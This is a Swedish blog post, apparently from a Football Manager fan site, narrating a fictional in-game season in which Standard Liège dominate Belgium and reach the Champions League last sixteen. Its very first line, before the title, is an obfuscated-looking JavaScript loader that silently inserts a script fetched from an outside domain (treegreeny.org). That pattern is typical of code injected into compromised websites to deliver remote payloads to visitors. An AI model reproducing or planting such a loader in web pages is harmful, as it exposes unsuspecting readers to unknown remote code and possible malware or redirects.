;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bäst i världen?? – FMSweden
Meny Stäng

Bäst i världen??

Skulle Standard kunna följa upp sin trippel från året innan? Skulle Matías Antúnez fortsätta ösa in mål? Skulle laget kunna göra något väsen av sig i Europa? Frågorna var många, svaren likaså…

Säsongen 2027/28 började som den föregående slutade, Standard vann en titel. Efter 5-0 i belgiska supercupen mot Club Brügge, så gav det en rejäl fingervisning om hur säsongen skulle utforma sig. Antúnez började med ett hattrick och hans målgörande var igång och det skulle bara fortsätta.

Säsongen började med två vinster innan det kom en chockförlust borta mot Mouscron. Skulle Standard vackla? Svaret var nej, detta var hälften av alla förluster under hela året i belgiska ligan.

Standard gick sedan på en 24 matcher lång förlustfri rad, innan Charleroi lyckades bryta sviten med en vinst på sin hemmaarena Stade de Pays de Charleroi.

I Champions League lottades man mot Bayern München, Chelsea och Lyon.

En galen lottning för Bagis mannar, men det visade sig rätt snabbt att man inte var där som turister. En förlust på Stamford Bridge mot Chelsea, följdes upp med en galen rekordmatch hemma i Liége, där Lyon besegrades med hela 8-2!! En ny superstar fick sitt definitiva genombrott i den här matchen, då Djordje Fratrovic, den 18-årige serben, gjorde fem(!!) mål. Han skulle visa sig vara mer än en dagslända den här säsongen.

I belgiska cupen gick det ungefär som det brukar i cupspecialisten Bagis matcher. Man stormade fram till final och i finalen skulle man senare ställas mot Cercle Brügge.

I ligan fortsatte dominansen, forwardsparet Antúnez och Fratrovic, slutade till sist etta och tvåa i skytteligan på 32 resp 31 mål. Antúnez skulle komma att sluta på andra plats i hela Europas Guldskorace, endast slagen av Real Madrids turkiske superstar Metin Özturk. Räkna med att den vindsnabbe forwarden kommer vinna racet i framtiden, då han redan nu, räknas som en av de bästa i världen.

När Champions League fortsatte, visade Standard musklerna mot jättarna från grannlandet. Bayern vann visserligen på Allianz Arena med 2-1, men i returmötet slog det unga Standard tillbaka de flerfaldiga europeiska mästarna med 2-0. Det resultatet skulle visa sig vare mycket viktigt framöver.

Efter ytterligare en förlust mot Chelsea, så var det en helt avgörande match mot Lyon borta, för att bestämma vilka lag som skulle avancera från gruppen.

I en nya galen match, vann Standard till slut med 6-3 mot Lyon, samtidigt som Chelsea slog Bayern München. Det gjorde att Chelsea vann gruppen och att Standard mot alla odds, tack vare inbördes möten mot Bayern, gick vidare som tvåa. En enorm skräll och tyskarna var helt sensationellt utslagna och fick spela vidare i Europa League.

I åttondelsfinalen lottades Standard mot Premier Leagueledarna Manchester United.

Efter ett rött kort i hemmamatchen redan efter 25 minuter, sprang Rashford och co sönder Standard och visade att det unga laget hade en bit kvar till toppen av Europa. 0-5 hemma och sedan 1-5 på Old Trafford, var en läropeng för Standard, som kunde koncentrera sig på inhemska spelet.

Det inhemska spelet var dock inga problem för Standard denna säsong.

Cupfinalen vanns med 5-0 mot Cercle Brügge och fjärde raka cuptiteln för Devran NH Bagis var ett faktum.

I ligan gick man in i mästerskapsserien med 7 poängs försprång och den ledningen bara växte. Efter ligan var slutspelad hade Standard Liége vunnit serien med hela 15 poäng och dominansen i Belgien är total.

Antúnez och Fratrovic gjorde tillsammans makalösa 102 mål i alla tävlingar. Ett galet facit och vi lär se dessa två i större ligor inom kort.

Säsongen är slut och motivationen börjar tryta, kanske är det dags för Devran NH Bagis att återigen vidga vyerna och ta sig vidare i karriären. Den som hänger med får se.

Trevlig helg på er.

SKÅL

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar